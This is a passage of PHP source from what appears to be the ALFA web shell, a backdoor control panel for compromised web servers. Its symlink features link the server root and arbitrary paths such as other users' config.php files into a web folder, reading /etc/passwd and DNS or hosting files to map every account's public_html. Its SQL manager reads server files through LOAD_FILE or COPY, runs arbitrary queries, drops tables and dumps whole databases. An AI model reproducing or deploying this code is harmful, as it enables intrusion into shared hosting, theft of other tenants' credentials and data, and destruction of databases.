4329if(isset($_POST['alfa4']) && $_POST['alfa4']=='SymFile'){
4330if(function_exists('symlink')||_alfa_can_runCommand(true,true)){
4331AlfaNum(9,10);
4332echo __pre().'
4333<center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g(\'symlink\',null,null,null,null,\'SymFile\',this.file.value,this.symfile.value,this.symlink.value);return false;" method="post">
4334<input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />
4335<input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/>
4336<p><input type="submit" value=" " name="symlink" /></p></form></center>';
4337$path = $_POST['alfa5'];
4338$symname = $_POST['alfa6'];
4339$solevisible58 = $_POST['alfa7'];
4340if($solevisible58){
4341$new_name = str_replace(".", "_", basename($symname));
4342$rand_dir = $new_name.rand(111,9999);
4343$sym_dir = 'alfasymlinkphp/'.$rand_dir.'/';
4344@mkdir($sym_dir, 0777, true);
4345alfacgihtaccess('sym', $sym_dir, $symname);
4346_alfa_symlink("$path","$sym_dir/$symname");
4347echo __pre();
4348echo '<center><b><font color="white">Click >> </font><a target="_blank" href="'.__ALFA_DATA_FOLDER__."/".$sym_dir.'" ><b><font size="4">'.$symname.'</font></b></a></b></center>';
4349}
4350}else{echo "<center><pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";}
4351}
4352if(isset($_POST['alfa2']) && $_POST['alfa2']=='symphp'){
4353$cant_symlink = true;
4354if(function_exists('symlink')||_alfa_can_runCommand(false,false)){
4355@mkdir('alfasymlink',0777);
4356alfacgihtaccess('sym','alfasymlink/');
4357_alfa_symlink('/','alfasymlink/root');
4358$table_header = "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><table id='tbl_sympphp' align='center' width='40%' class='main' border='1'><td><span style='color:#FFFF01;'><b>*</span></b></td><td><span style='color:#00A220;'><b>Domains</span></b></td><td><span style='color:#FFFFFF;'><b>Users</span></b></td><td><span style='color:#FF0000;'><b>symlink</span></b></td>";
4359if(_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")){
4360echo "<center>";
4361$lines = array();
4362$anony_domains = array();
4363$anonymous_users = array();
4364$f_black = array();
4365$error = false;
4366$anonymous = false;
4367$makepwd = "/home/{user}/public_html/";
4368$domains = alfaGetDomains();
4369$lines = $domains["lines"];
4370$state = $domains["state"];
4371$is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");
4372$can_runcmd = _alfa_can_runCommand(false,false);
4373if(!$is_posix && !$can_runcmd){
4374 $anonymous = true;
4375 $anony_domains = $domains["lines"];
4376 $lines = _alfa_file('/etc/passwd');
4377}
4378echo $table_header;
4379$count=1;
4380$template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="{http}"/><span style="color:#00A220;margin-left:10px;"><b>{domain}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{owner}</font></b></td><td><a href="'.__ALFA_DATA_FOLDER__.'/alfasymlink/root{sympath}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
4381foreach($lines as $line){
4382 $domain = "";
4383 $owner = "";
4384 if($anonymous){
4385 $explode = explode(":", $line);
4386 $owner = $explode[0];
4387 $owner_len = strlen($owner) - 1;
4388 $userid = $explode[2];
4389 if((int)$userid < 500)continue;
4390 $domain = "[?????]";
4391 $temp_black = array();
4392 $finded = false;
4393 foreach($anony_domains as $anony){
4394 if($state == "named.conf"){
4395 if(@strstr($anony, 'zone')){
4396 preg_match_all('#zone "(.*)"#',$anony, $data);
4397 $domain = $data[1][0];
4398 }else{
4399 continue;
4400 }
4401 }elseif($state == "named" || $state == "valiases"){
4402 if($anony == "." || $anony == "..")continue;
4403 if($state == "named")$anony = rtrim($anony, ".db");
4404 $domain = $anony;
4405 }
4406 $sub_domain = str_replace(array("-","."), "", $domain);
4407 if(substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)){
4408 if(in_array($owner.$domain, $temp_black))continue;
4409 $sympath = str_replace("{user}", $owner, $makepwd);
4410 $http = "http://".$domain;
4411 echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
4412 $count++;
4413 $temp_black[] = $owner.$domain;
4414 $finded = true;
4415 }
4416 }
4417 if(!$finded){
4418 $anonymous_users[] = $owner;
4419 }
4420 }else{
4421 if($state == "named.conf"){
4422 if(@strstr($line, 'zone')){
4423 preg_match_all('#zone "(.*)"#',$line, $data);
4424 $domain = $data[1][0];
4425 }else{
4426 continue;
4427 }
4428 }elseif($state == "named" || $state == "valiases"){
4429 if($line == "." || $line == "..")continue;
4430 if($state == "named")$line = rtrim($line, ".db");
4431 $domain = $line;
4432 }
4433 if(strlen(trim($domain)) > 2 && $state != "passwd"){
4434 if(!_alfa_file_exists('/etc/valiases/'.$domain, false))continue;
4435 if($is_posix){
4436 $user = @posix_getpwuid(@fileowner('/etc/valiases/'.$domain));
4437 $owner = $user["name"];
4438 }elseif($can_runcmd){
4439 $owner = alfaEx("stat -c '%U' /etc/valiases/".$domain,false,false);
4440 }
4441 }
4442 }
4443 if(!$anonymous){
4444 if(strlen($owner)==0 || in_array($owner.$domain, $f_black))continue;
4445 $sympath = str_replace("{user}", $owner, $makepwd);
4446 $http = "http://".$domain;
4447 if($state == "passwd"){
4448 $http = "javascript:alert('we cant find domain...')";
4449 }
4450 echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
4451 $count++;
4452 $f_black[] = $owner.$domain;
4453 }
4454}
4455if($anonymous){
4456 foreach($anonymous_users as $owner){
4457 $sympath = str_replace("{user}", $owner, $makepwd);
4458 $http = "javascript:alert('we cant find domain...')";
4459 echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template);
4460 $count++;
4461 }
4462}
4463$cant_symlink = false;
4464}else{
4465$is_direct = false;
4466$makepwd = alfaMakePwd();
4467if(_alfa_file_exists("/etc/virtual/domainowners")){
4468 $makepwd = "/home/{user}/public_html";
4469 $is_direct = true;
4470}
4471$sole = _alfa_file("/etc/virtual/domainowners");
4472$count=1;
4473echo $table_header;
4474$template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="http://www.{url}"/><span style="color:#00A220;margin-left:10px;"><b>{url}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{user}</font></b></td><td><a href="'.__ALFA_DATA_FOLDER__.'/alfasymlink/root{cwd}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
4475if($sole){
4476 foreach($sole as $visible){
4477 if(@strstr($visible,":")){
4478 $solevisible = explode(':', $visible);
4479 $cwd = str_replace("{user}", trim($solevisible[1]), $makepwd);
4480 echo str_replace(array("{count}","{user}","{url}","{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);
4481 }
4482 }
4483}else{
4484 $passwd = _alfa_file("/etc/passwd");
4485 if($passwd){
4486 $html = "";
4487 $is_named = false;
4488 $users = array();
4489 $domains = array();
4490 $uknowns = array();
4491 foreach($passwd as $user){
4492 $user = trim($user);
4493 $expl = explode(":", $user);
4494 if((int)$expl[2] < 500)continue;
4495 $users[$expl[0]] = $expl[5];
4496 }
4497 $site_domains = @scandir("/etc/virtual/");
4498 if(!$site_domains){
4499 $site_domains = alfaEx("ls /etc/virtual/");
4500 $site_domains = explode("\n", $site_domains);
4501 if(!$site_domains){
4502 $site_domains = _alfa_file("/etc/named.conf");
4503 if($site_domains){$is_named = true;}
4504 }
4505 }
4506 foreach($site_domains as $line){
4507 if($is_named){
4508 if(@strstr($line, 'zone')){
4509 preg_match_all('#zone "(.*)"#',$line, $data);
4510 $domain = $data[1][0];
4511 if(strlen($domain > 2) && !empty($domain)){
4512 $domains[] = $domain;
4513 }
4514 }
4515 }else{
4516 $domains[] = $line;
4517 }
4518 }
4519 $x = 1;
4520 foreach($users as $user => $home){
4521 foreach($domains as $domain){
4522 $user_len = strlen($user) - 1;
4523 $sub_domain = str_replace(array("-","."), "", $domain);
4524 $five_user = substr($user, 0,$user_len);
4525 $five_domain = substr($sub_domain, 0,$user_len);
4526 if($five_user == $five_domain){
4527 if($is_direct){
4528 $cwd = str_replace("{user}", $user, $makepwd);
4529 }else{
4530 $expl = explode("}/", $makepwd);
4531 $cwd = $home."/".$expl[1];
4532 }
4533 $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template);
4534 }else{
4535 $uknowns[$user] = $home;
4536 }
4537 }
4538 }
4539 $uknowns = array_unique($uknowns);
4540 foreach($uknowns as $user => $home){
4541 if($is_direct){
4542 $cwd = str_replace("{user}", $user, $makepwd);
4543 }else{
4544 $expl = explode("}/", $makepwd);
4545 $cwd = $home."/".$expl[1];
4546 }
4547 $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template);
4548 }
4549 echo($html);
4550 }
4551}
4552echo "</table>";
4553$cant_symlink = false;
4554}
4555}else{
4556 echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
4557 $cant_symlink = false;
4558}
4559if($cant_symlink)echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b><br>';
4560echo "</center></table>";
4561}
4562echo "</div>";
4563alfafooter();
4564}
4565function alfasql(){
4566class DbClass{
4567public $type;
4568public $link;
4569public $res;
4570public $mysqli_connect_error = false;
4571public $mysqli_connect_error_msg = "";
4572function __construct($type){
4573$this->type = $type;
4574}
4575function connect($host, $user, $pass, $dbname){
4576switch($this->type){
4577case 'mysql':
4578if($this->link = @mysqli_connect($host,$user,$pass,$dbname)){
4579 return true;
4580}else{
4581 $this->mysqli_connect_error = true;
4582 $this->mysqli_connect_error_msg = mysqli_connect_error();
4583 return false;
4584}
4585break;
4586case 'pgsql':
4587$host = explode(':', $host);
4588if(!$host[1]) $host[1]=5432;
4589if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
4590break;
4591}
4592return false;
4593}
4594function selectdb($db){
4595switch($this->type){
4596case 'mysql':
4597if(@mysqli_select_db($db))return true;
4598break;
4599}
4600return false;
4601}
4602function query($str){
4603switch($this->type){
4604case 'mysql':
4605return $this->res = @mysqli_query($this->link,$str);
4606break;
4607case 'pgsql':
4608return $this->res = @pg_query($this->link,$str);
4609break;
4610}
4611return false;
4612}
4613function fetch(){
4614$res = func_num_args()?func_get_arg(0):$this->res;
4615switch($this->type){
4616case 'mysql':
4617return @mysqli_fetch_assoc($res);
4618break;
4619case 'pgsql':
4620return @pg_fetch_assoc($res);
4621break;
4622}
4623return false;
4624}
4625function listDbs(){
4626switch($this->type){
4627case 'mysql':
4628return $this->query("SHOW databases");
4629break;
4630case 'pgsql':
4631return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
4632break;
4633}
4634return false;
4635}
4636function listTables(){
4637switch($this->type){
4638case 'mysql':
4639return $this->res = $this->query('SHOW TABLES');
4640break;
4641case 'pgsql':
4642return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
4643break;
4644}
4645return false;
4646}
4647function error(){
4648switch($this->type){
4649case 'mysql':
4650return @mysqli_error($this->link);
4651break;
4652case 'pgsql':
4653return @pg_last_error();
4654break;
4655}
4656return false;
4657}
4658function setCharset($str){
4659switch($this->type){
4660case 'mysql':
4661if(function_exists('mysql_set_charset'))
4662return @mysqli_set_charset($this->link,$str);
4663else
4664$this->query('SET CHARSET '.$str);
4665break;
4666case 'pgsql':
4667return @pg_set_client_encoding($this->link, $str);
4668break;
4669}
4670return false;
4671}
4672function loadFile($str){
4673switch($this->type){
4674case 'mysql':
4675return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
4676break;
4677case 'pgsql':
4678$this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '".addslashes($str)."';select file from solevisible;");
4679$r=array();
4680while($i=$this->fetch())
4681$r[] = $i['file'];
4682$this->query('drop table solevisible');
4683return array('file'=>implode("\n",$r));
4684break;
4685}
4686return false;
4687}
4688};
4689$db = new DbClass($_POST['type']);
4690alfahead();
4691$form_visibility = "table";
4692if(isset($_POST['sql_host'])){
4693 $connection_db = $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
4694 if($connection_db && !empty($_POST['sql_base'])){
4695 $form_visibility = "none";
4696 }
4697}
4698$database_list = array();
4699echo "
4700<div class='header' style='min-height:300px;'>".($form_visibility!="none"?"<center><div class='txtfont_header'>| Sql Manager |</div><p>".getConfigHtml('all')."</p></center><div style='text-align:center;margin-bottom: 10px;'><button class='connection-his-btn db-opt-id' onclick='alfaShowConnectionHistory(this);' mode='on'>Connection History</button><div class='connection_history_holder'></div></div>":"")."
4701<div class='sf' class='db-opt-id'><table style='margin: 0 auto;".($form_visibility=="none"?"display:none;":"")."' cellpadding='2' cellspacing='0'><tr>
4702<td><div class=\"txtfont\">TYPE</div></td><td><div class=\"txtfont\">HOST</div></td><td><div class=\"txtfont\">DB USER</div></td><td><div class=\"txtfont\">DB PASS</div></td><td><div class=\"txtfont\">DB NAME</div></td><td></td></tr><tr>
4703<td><select name='type'><option value='mysql' selected>mysql</option></select></td>
4704<td><input type='text' name='sql_host' id='db_host' value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
4705<td><input type='text' name='sql_login' id='db_user' value='". (empty($_POST['sql_login'])?'':htmlspecialchars($_POST['sql_login'])) ."'></td>
4706<td><input type='text' name='sql_pass' id='db_pw' value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
4707$tmp = "<input type='text' name='sql_base' id='db_name' value='". (empty($_POST['sql_base'])?'':htmlspecialchars($_POST['sql_base'])) ."'>";
4708if(isset($_POST['sql_host'])){
4709if($connection_db){
4710$db->setCharset('utf8');
4711$db->listDbs();
4712echo "<select name=sql_base><option value=''></option>";
4713while($item = $db->fetch()) {
4714list($key, $value) = each($item);
4715$database_list[] = $value;
4716echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
4717}
4718echo '</select>';
4719}else{
4720 echo $tmp;
4721}
4722}else
4723echo $tmp;
4724$curr_mysql_id = $_POST['current_mysql_id'];
4725echo "</td>
4726<td><button onclick='fs(this);return false;' class='db-opt-id db-connect-btn'>Connect</button></td>
4727<td><input type='checkbox' name='sql_count' value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> <div class=\"txtfont\">count the number of rows</div></td>
4728</tr>
4729</table>";
4730if($db->mysqli_connect_error){
4731 echo '<div style="text-align: center;font-size: 17px;margin-top: 18px;">'.$db->mysqli_connect_error_msg.'</div>';
4732}
4733if(!empty($curr_mysql_id)){
4734 $sql_title_db = "";
4735 if(!empty($_POST['sql_base'])){
4736 $sql_title_db = "d.querySelector('#tab_".$curr_mysql_id." span').innerHTML='".addslashes($_POST['sql_base'])."';";
4737 }
4738 echo "<script>mysql_cache['".$curr_mysql_id."']['host']='".addslashes($_POST['sql_host'])."';mysql_cache['".$curr_mysql_id."']['user']='".addslashes($_POST['sql_login'])."';mysql_cache['".$curr_mysql_id."']['pass']='".addslashes($_POST['sql_pass'])."';mysql_cache['".$curr_mysql_id."']['db']='".addslashes($_POST['sql_base'])."';mysql_cache['".$curr_mysql_id."']['charset']='".addslashes($_POST['charset'])."';mysql_cache['".$curr_mysql_id."']['type']='".addslashes($_POST['type'])."';mysql_cache['".$curr_mysql_id."']['count']='".addslashes($_POST['sql_count'])."';".$sql_title_db."alfaConnectionHistoryUpdate();</script>";
4739}
4740if(isset($db) && $db->link){
4741if(!empty($_POST['sql_base'])){
4742echo "<div class='mysql-main'><div mode='block' onclick='alfaMysqlTablePanelCtl(this);' class='tables-panel-ctl db-opt-id'><<</div><div class='mysql-tables'><div><input placeholder=\"Filter Table\" style='padding: 0;margin-left: 11px;text-align:center;' type='text' name='filter_all'><button class='db-opt-id' onclick='alfaMysqlFilterAllTable(this);return false;'>Search</button></div><div class='block'><a sql_count='".(empty($_POST['sql_count'])?"false":"true")."' mode='closed' onclick='alfaMysqlFilterAllTable(this,true);' class='expander parent-expander db-opt-id' href='javascript:void(0);'><img src='http://solevisible.com/icons/menu/b_plus.png' title='Expand/Collapse All DataBases' alt='Expand/Collapse All DataBases'></a></div><ul style='margin-top: 28px;'>";
4743foreach ($database_list as $db_name) {
4744 echo '<li><div class="block"><i></i><b></b><a sql_count="'.(empty($_POST['sql_count'])?"false":"true").'" db_target="'.$db_name.'" onclick="alfaMysqlExpander(this);" class="expander cls-'.$db_name.'-expander db-opt-id" href="javascript:void(0);"><img src="http://solevisible.com/icons/menu/'.($db_name == $_POST['sql_base']?"b_minus.png":"b_plus.png").'" title="Expand/Collapse" alt="Expand/Collapse"></a></div><span class="db_name">'.$db_name.'</span><div class="clearfloat"></div><div db_name="'.$db_name.'" mode="'.($db_name == $_POST['sql_base']?"loaded":"no").'" class="list_container cls-'.$db_name.'"><div>';
4745 if($db_name == $_POST['sql_base']){
4746 $db->selectdb($_POST['sql_base']);
4747 $tbls_res = $db->listTables();
4748 echo '<ul><li><div class="block"><i></i><b></b></div><div><input style="padding: 0;margin-left: 11px;text-align:center;" type="text" class="db-opt-id" target=".cls-'.$db_name.'" placeholder="Filter Table" onkeyup="alfaMysqlFilterTable(this);" name="filter"></div></li>';
4749 while($item = $db->fetch($tbls_res)){
4750 list($key, $value) = each($item);
4751 if(!empty($_POST['sql_count']))
4752 $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `'.$value.'`'));
4753 $value = htmlspecialchars($value);
4754 echo "<li><div class='block'><i></i><b></b></div><div class='tables-row'><input type='checkbox' name='tbl[]' value='".$value."'> <a class='db-opt-id' db_target='".$db_name."' href='javascript:void(0);' onclick=\"alfaLoadTableData(this,'".$value."')\"><span class='mysql_tables' style='font-weight:unset;'>".$value."</span></a>" . (empty($_POST['sql_count'])?' ':" <small><span style='font-weight:unset;' class='mysql_table_count'>({$n['n']})</span></small>") . "</div></li>";
4755 }
4756 echo '</ul><div style="margin-left: 26px;margin-bottom: 10px;margin-top: 10px;"><input onchange="alfaMysqlTablesEvil(this);" class="db-opt-id" target=".cls-'.$db_name.'" type="checkbox" class="db-opt-id"><select onchange="alfaMysqlTablesDumpDrop(this);" class="db-opt-id" target=".cls-'.$db_name.'" class="db-opt-id" name="tables_evil" style="padding: 0;width: 100px;"><option selected>drop</option><option>dump</option></select> <button onclick="alfaMysqlTablesDumpDropBtn(this);return false;" class="db-opt-id" db_target="'.$db_name.'" target=".cls-'.$db_name.'" class="db-opt-id">Do it</button><div class="dump-file-holder" style="display:none;margin-left:20px;margin-top: 5px;"><input style="padding: 0;text-align:center;" type="text" placeholder="dump.sql" name="dump_file"></div></div>';
4757 }
4758 echo "</div></li>";
4759}
4760echo "</ul></div><div class='mysql-query-results'><div class='mysql-query-result-tabs'><div class='db-opt-id mysql-query-selected-tab' target='.mysql-query-result-content' onclick='alfaMysqlTabCtl(this);'>Result</div><div class='db-opt-id' target='.mysql-query-form' onclick='alfaMysqlTabCtl(this);'>Query</div><div class='db-opt-id' target='.mysql-search-area' onclick='alfaMysqlTabCtl(this);'>Search</div><div class='db-opt-id' target='.mysql-structure' onclick='alfaMysqlTabCtl(this);'>Structure</div><div class='db-opt-id' target='.mysql-insert-row' onclick='alfaMysqlTabCtl(this);'>Insert</div><div style='display:none;' class='db-opt-id' target='.mysql-edit-row' onclick='alfaMysqlTabCtl(this);'>Edit</div></div><div class='mysql-query-content mysql-insert-row mysql-hide-content'></div><div class='mysql-query-content mysql-edit-row mysql-hide-content'></div><div class='mysql-query-content mysql-search-area mysql-hide-content'></div><div class='mysql-query-content mysql-structure mysql-hide-content'></div><div class='mysql-query-content mysql-query-form mysql-hide-content'><div style='margin-bottom: 5px;'><span>Query:</span></div><textarea name='query' style='width:90%;height:100px'></textarea><p><div style='float:left;margin-left: 30px;'><input class='button db-opt-id' db_target='".$_POST['sql_base']."' onclick='alfaMysqlQuery(this);return false;' type='submit' value=' '></div></p></div><div class='mysql-query-content mysql-query-result-content'><div class='mysql-query-result-header'><div style='margin-bottom: 10px;' class='mysql-query-reporter'></div><div class='mysql-query-pager'></div></div><div class='mysql-query-table'></div></div></form></td></tr>";
4761}
4762echo "</table></div>";
4763echo "</div>";
4764}else{
4765echo htmlspecialchars($db->error());
4766}
4767echo '</div>';
4768alfafooter();
4769}
4770function alfaSql_manager_api(){
4771 $db = $_POST["alfa1"];
4772 $type = $_POST["alfa2"];
4773 $sql_count = $_POST["alfa3"] == "true" ? true : false;
4774 $db = @json_decode($db, true);
4775 $conn = @mysqli_connect($db["host"], $db["user"], $db["pass"], $db["db"]);
4776 @mysqli_set_charset($conn, "utf8");
4777 if($conn){
4778 if($type == "load_all_tables"){
4779 $tables = array();
4780 $q_tables = @mysqli_query($conn, "SELECT `table_schema`, `table_name` FROM `information_schema`.`tables` WHERE `table_schema` IN ('".implode("','", $db["databases"])."');");
4781 $count = 0;
4782 while($row = @mysqli_fetch_assoc($q_tables)){
4783 if($sql_count){
4784 $count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `'.$row["table_schema"].'`.`'.$row["table_name"].'`');
4785 if($count_q){
4786 $count = @mysqli_fetch_row($count_q);
4787 $count = $count[0];
4788 }
4789 }
4790 $tables[$row["table_schema"]][] = array("name" => $row["table_name"], "count" => (int)$count);
4791 }
4792 foreach($db["databases"] as $db){
4793 if(!isset($tables[$db])){
4794 $tables[$db] = null;
4795 }
4796 }
4797 echo @json_encode($tables);
4798 }elseif($type == "dump_drop"){
4799 if($db["mode"] == "drop"){
4800 foreach ($db["tables"] as $table) {
4801 @mysqli_query($conn, "DROP TABLE `".$table."`;");
4802 }
4803 $tables = array();
4804 $q_tables = @mysqli_query($conn, "SHOW TABLES;");
4805 $count = 0;
4806 while($row = @mysqli_fetch_array($q_tables)){
4807 if($sql_count){
4808 $count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `'.$row[0].'`');
4809 if($count_q){
4810 $count = @mysqli_fetch_row($count_q);
4811 $count = $count[0];
4812 }
4813 }
4814 $tables[] = array("name" => $row[0], "count" => (int)$count);
4815 }
4816 echo @json_encode($tables);
4817 }else{
4818 if(strlen(alfaEx("mysqldump"))>0){
4819 alfaEx("mysqldump --single-transaction --host=\"".$db["host"]."\" --user=\"".$db["user"]."\" --password=\"".$db["pass"]."\" ".$db["db"]." ".implode(" ", $db["tables"])." > ".$db["dump_file"]);
4820 }else{
4821 $fp = @fopen($db["dump_file"], "w");
4822 foreach ($db["tables"] as $table) {
4823 $res = @mysqli_query($conn, 'SHOW CREATE TABLE `'.$table.'`');
4824 $create = @mysqli_fetch_array($res);
4825 $sql = "DROP TABLE IF EXISTS `".$table."`;\n" . $create[1].";\n";
4826 if($fp) fwrite($fp, $sql); else echo($sql);
4827 $tbl_data = @mysqli_query($conn, 'SELECT * FROM `'.$table.'`');
4828 $head = true;
4829 while($item = @mysqli_fetch_assoc($tbl_data)){
4830 $columns = array();
4831 foreach($item as $k=>$v) {
4832 if($v == null)
4833 $item[$k] = "''";
4834 elseif(is_numeric($v))
4835 $item[$k] = $v;
4836 else
4837 $item[$k] = "'".@mysqli_real_escape_string($conn, $v)."'";
4838 $columns[] = "`".$k."`";
4839 }
4840 if($head) {
4841 $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
4842 $head = false;
4843 } else
4844 $sql = "\n\t,(".implode(", ", $item).')';
4845 if($fp) fwrite($fp, $sql); else echo($sql);
4846 }
4847 if(!$head)
4848 if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
4849 }
4850 }
4851 echo @json_encode(array("status" => true, "file" => $db["dump_file"]));
4852 }
4853 }elseif($type == "load_tables"){
4854 $tables = array();
4855 $q_tables = @mysqli_query($conn, "SHOW TABLES;");
4856 $count = 0;
4857 while($row = @mysqli_fetch_array($q_tables)){
4858 if($sql_count){
4859 $count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `'.$row[0].'`');
4860 if($count_q){
4861 $count = @mysqli_fetch_row($count_q);
4862 $count = $count[0];
4863 }
4864 }
4865 $tables[] = array("name" => $row[0], "count" => (int)$count);
4866 }
4867 echo @json_encode($tables);
4868 }elseif($type == "alter"){
4869 $db["alter"]["type"] = strtolower($db["alter"]["type"]);
4870 $inputs = $db["alter"]["type"]."(".$db["alter"]["input"].")";
4871 $text_input = array("longtext", "text", "mediumtext", "tinytext");
4872 if(in_array($db["alter"]["type"], $text_input)){
4873 $inputs = $db["alter"]["type"];
4874 }
4875 @mysqli_query($conn, "ALTER TABLE `".$db["table"]."` MODIFY COLUMN `".$db["column"]."` " . $inputs);
4876 $error = @mysqli_error($conn);
4877 if($error){
4878 echo $error;
4879 }else{
4880 echo "ok";
4881 }
4882 }elseif($type == "edit" || $type == "delete" || $type == "delete_all"){
4883 if($type == "edit"){
4884 $q = @mysqli_query($conn, "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` WHERE `".$db["col_key"]."` = '".addslashes($db["key"])."' LIMIT 0,1");
4885 $row = @mysqli_fetch_assoc($q);
4886 if($row){
4887 $columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE, DATA_TYPE as type FROM information_schema.columns WHERE `TABLE_SCHEMA` = '".$db["db"]."' AND `TABLE_NAME` = '".$db["table"]."'");
4888 $columns = array();
4889 $edit_data = array();
4890 while($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){
4891 $input = array("col_type" => $row2["COLUMN_TYPE"]);
4892 $row2["type"] = strtolower($row2["type"]);
4893 switch($row2["type"]){
4894 case "longtext": case "text": case "mediumtext": case "tinytext":
4895 $input["tag"] = "textarea";
4896 break;
4897 case "int": case "smallint": case "bigint": case "tinyint": case "mediumint":
4898 $input["tag"] = "input";
4899 $input["type"] = "number";
4900 break;
4901 default:
4902 $input["tag"] = "input";
4903 $input["type"] = "text";
4904 }
4905 $columns[$row2["name"]] = $input;
4906 }
4907 foreach($row as $key => $v){
4908 $edit_data[] = array("col" => $key, "value" => htmlspecialchars($v, ENT_QUOTES, 'UTF-8'), "type" => $columns[$key]);
4909 }
4910 echo @json_encode($edit_data);
4911 }
4912 }else{
4913 if($type == "delete_all"){
4914 $rows = implode("', '", $db["rows"]);
4915 }else{
4916 $rows = addslashes($db["key"]);
4917 }
4918 $query = "DELETE FROM `".$db["db"]."`.`".$db["table"]."` WHERE `".$db["col_key"]."` IN ('".$rows."')";
4919 @mysqli_query($conn, $query);
4920 $error = @mysqli_error($conn);
4921 if($error){
4922 $status = false;
4923 }else{
4924 $status = true;
4925 }
4926 echo @json_encode(array("status" => $status, "error" => $error, "query" => $query));
4927 }
4928 }elseif($type == "update"){
4929 $query = "UPDATE `".$db["db"]."`.`".$db["table"]."` SET ";
4930 foreach($db["data"] as $col => $val){
4931 $query .= "`".$col."` = '".mysqli_real_escape_string($conn, $val)."',";
4932 }
4933 $query = substr($query, 0, -1);
4934 $query .= "WHERE `".$db["col_key"]."` = '".$db["key"]."'";
4935 $res = @mysqli_query($conn, $query);
4936 echo @json_encode(array("status" => $res, "error" => @mysqli_error($conn)));
4937 }elseif($type == "insert"){
4938 $query = "INSERT INTO `".$db["db"]."`.`".$db["table"]."` ";
4939 foreach($db["data"] as $col => $val){
4940 $cols .= $col . ",";
4941 $vals .= "'".mysqli_real_escape_string($conn, $val)."',";
4942 }
4943 $cols = substr($cols, 0, -1);
4944 $vals = substr($vals, 0, -1);
4945 $query = $query . "(" . $cols . ")" . "VALUES(" . $vals . ")";
4946 $res = @mysqli_query($conn, $query);
4947 echo @json_encode(array("status" => $res, "error" => @mysqli_error($conn)));
4948 }else{
4949 $pages = 0;
4950 $title = false;
4951 $query = "";
4952 $tbl_content = '<table width="100%" cellspacing="1" cellpadding="2" class="main mysql-data-tbl" style="background-color:#292929">';
4953 $line = 0;
4954 $tables = array();
4955 $columns = array();
4956 if($type == "load_data"){
4957 $query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` LIMIT 0,30";
4958 $tbl_count_q = @mysqli_query($conn, "SELECT COUNT(*) FROM `".$db["db"]."`.`".$db["table"]."`");
4959 $tbl_count = @mysqli_fetch_row($tbl_count_q);
4960 $columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE as type, COLLATION_NAME as collation, DATA_TYPE as data_type, CHARACTER_MAXIMUM_LENGTH as type_value FROM information_schema.columns WHERE `TABLE_SCHEMA` = '".$db["db"]."' AND `TABLE_NAME` = '".$db["table"]."'");
4961 while($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){
4962 $columns[] = $row2;
4963 }
4964 if($tbl_count[0] > 30){
4965 $pages = ceil($tbl_count[0] / 30);
4966 }
4967 }elseif($type == "query"){
4968 $query = $db["query"];
4969 }elseif($type == "page"){
4970 $db["page"] = (int)$db["page"] - 1;
4971 $query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` LIMIT ".($db["page"]*30).",30";
4972 }elseif($type == "search"){
4973 $search = "";
4974 $search_noval = array("= ''", "!= ''", "IS NULL", "IS NOT NULL");
4975 foreach($db["search"] as $col => $val){
